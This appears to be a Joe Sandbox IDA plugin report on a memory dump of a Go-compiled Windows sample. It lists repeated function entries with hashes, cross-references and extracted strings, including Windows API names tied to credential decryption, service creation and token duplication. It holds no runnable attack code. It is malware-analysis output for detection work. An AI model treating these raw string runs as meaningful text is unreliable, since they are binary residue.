because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction ID: f293bcf75fbe30c709e4b928e573bbee9318cbda0f6d8998216264a67793ec25
Opcode Fuzzy Hash: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction Fuzzy Hash: 29417032209E8491E760AB52E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770CB Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 0f10d1ee253fbea824d8d45ceda5a10fb0e1b3f8b10ea6815900c1519392f20f
Instruction ID: e9556f192f01bf77a48070c19e67b83cb1ce1408c3276add7216e0767d2708d7
Opcode Fuzzy Hash: 0f10d1ee253fbea824d8d45ceda5a10fb0e1b3f8b10ea6815900c1519392f20f
Instruction Fuzzy Hash: EF417E32209E8491E760AB62E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770D7 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction ID: f293bcf75fbe30c709e4b928e573bbee9318cbda0f6d8998216264a67793ec25
Opcode Fuzzy Hash: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction Fuzzy Hash: 29417032209E8491E760AB52E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770D1 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 2dccc72937d33566d464b9cbfe59f7f5cd18adee49141da37c2e7fa9987b8d05
Instruction ID: 3e91a585c24472b38e5789b7d89be11d1359d55c3eab6dcfb0bdaf5896d17800
Opcode Fuzzy Hash: 2dccc72937d33566d464b9cbfe59f7f5cd18adee49141da37c2e7fa9987b8d05
Instruction Fuzzy Hash: 9A417032209E8491E720AB52E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770DD Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction ID: f293bcf75fbe30c709e4b928e573bbee9318cbda0f6d8998216264a67793ec25
Opcode Fuzzy Hash: adf0ea537b40fbc1970cf60cbd31d73844bb35bce59e416a2b72b411449a3568
Instruction Fuzzy Hash: 29417032209E8491E760AB52E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A86DC0 Relevance: 7.6, Strings: 6, Instructions: 80COMMON

Download Yara Rule

Strings

mSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p, xrefs: 00A86EF9
span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UT, xrefs: 00A86E72
list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTa, xrefs: 00A86ECF
prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UT, xrefs: 00A86E8F
runtime: failed mSpanList.remove span.npages=transitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len is not zero (bad use of unsafe.Pointer? try -d=checkptr)726e6e6a203535726e6e6a787374347568, xrefs: 00A86E57
span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefai, xrefs: 00A86EAF

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

